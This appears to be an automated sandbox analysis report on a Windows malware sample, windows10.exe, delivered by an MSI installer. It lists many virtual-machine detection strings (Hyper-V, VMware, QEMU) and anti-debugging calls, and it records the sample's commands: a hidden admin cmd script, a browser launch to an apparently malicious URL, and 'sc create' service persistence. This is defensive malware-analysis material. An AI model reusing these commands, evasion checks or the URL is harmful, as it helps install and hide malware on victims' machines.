            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminLMEMHD
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Datacenter without Hyper-V Core
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-OperationalLMEMhL
            Source: windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM`(
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticS
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3514693196.000000000A065000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic]
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMUU
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug;
            Source: svchost.exe, 0000000E.00000002.4163150266.000001D04805A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.4155354040.000001D042A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debug@
            Source: windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh,
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`(fm
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307359931.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AdminLMEMX
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh\
            Source: windows10.exe, 0000001E.00000003.2502558872.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/DiagnosticP
            Source: windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2263029357.00000000006D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticQ
            Source: windows10.exe, 0000001E.00000003.2356244803.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2355988212.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin}
            Source: windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin~
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose_
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debugo
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2145511697.000000007FDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fsSecureVirtualMachine
            Source: windows10.exe, 0000001E.00000003.2308870441.0000000000716000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticXXO
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debugm
            Source: windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2415544285.00000000006E1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3120356246.000000000A04E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin
            Source: windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3218987599.000000000A060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin|
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operational$
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Adminz
            Source: windows10.exe, 0000001E.00000003.3323654097.000000000A054000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3316480949.000000000A04D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3321671075.000000000A05D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnosel
            Source: windows10.exe, 0000001E.00000003.3509025633.000000000A053000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3513785119.000000000A06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic6
            Source: windows10.exe, 0000001E.00000003.2355303518.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2354825006.000000000A045000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analyticu
            Source: windows10.exe, 0000001E.00000003.2356244803.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2355988212.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnoseo
            Source: windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A05F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A057000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-Analyticy
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnosek
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Datacenter without Hyper-V Full
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Debugb
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`P
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic%
            Source: windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2680934915.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnostic1
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic(
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Microsoft Hyper-V Server
            Source: windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic*
            Source: windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AnalyticLMEMh<fm
            Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Enterprise without Hyper-V Core
            Source: windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM` p8
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM``
            Source: windows10.exe, 0000001D.00000002.4159390497.000000000085D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\I
            Source: windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: stVMWare
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3415956998.000000000A072000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operationalalyticb
            Source: windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3629915822.000000000A06F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3626790511.000000000A054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admins
            Source: windows10.exe, 0000001E.00000003.2415217489.000000000071C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2414735750.000000000071C000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DiagnoseLMEMh4fm
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2679931213.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic}
            Source: windows10.exe, 0000001E.00000003.2674334142.000000000070F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628455964.00000000006FA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2307427865.00000000006EF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3117755720.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3009374102.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2260356698.00000000006AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM`
            Source: windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2308352872.0000000000703000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic<C
            Source: windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMhWn
            Source: windows10.exe, 0000001E.00000003.2355988212.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analyticy
            Source: windows10.exe, 0000001D.00000003.2144509027.000000007FCF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMWare
            Source: windows10.exe, 0000001E.00000003.2503011294.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2502558872.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational2
            Source: windows10.exe, 0000001E.00000003.3014016569.000000000A05B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3011554215.000000000A04F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-NETVSC/Diagnosticl
            Source: windows10.exe, 0000001E.00000003.2787786782.000000000A047000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2788629131.000000000A053000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose4
            Source: windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628086106.000000000A04F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591296015.000000000071B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2353191902.0000000000712000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.000000000070A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3506506350.00000000006F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AdminLMEMH
            Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00CBBF6F rdtsc 5_2_00CBBF6F
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF83BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00AF83BD
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B103E8 mov eax, dword ptr fs:[00000030h]3_2_00B103E8
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B0843F mov ecx, dword ptr fs:[00000030h]3_2_00B0843F
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B203E8 mov eax, dword ptr fs:[00000030h]4_2_00B203E8
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B1843F mov ecx, dword ptr fs:[00000030h]4_2_00B1843F
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B11533 GetProcessHeap,3_2_00B11533
            Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI5DCF.tmp "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\Jump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF83BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00AF83BD
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AFC3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00AFC3B6
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF8553 SetUnhandledExceptionFilter,3_2_00AF8553
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF7B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00AF7B9C
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B0C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00B0C3B6
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B083BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00B083BD
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B08553 SetUnhandledExceptionFilter,4_2_00B08553
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B07B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00B07B9C
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AD7660 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,3_2_00AD7660
            Source: C:\Windows\Installer\MSI5DCF.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.phpJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= autoJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start MeuServicoJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00AF801C cpuid 3_2_00AF801C
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoEx,3_2_00AF71C1
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: GetLocaleInfoEx,FormatMessageA,3_2_00AE2161
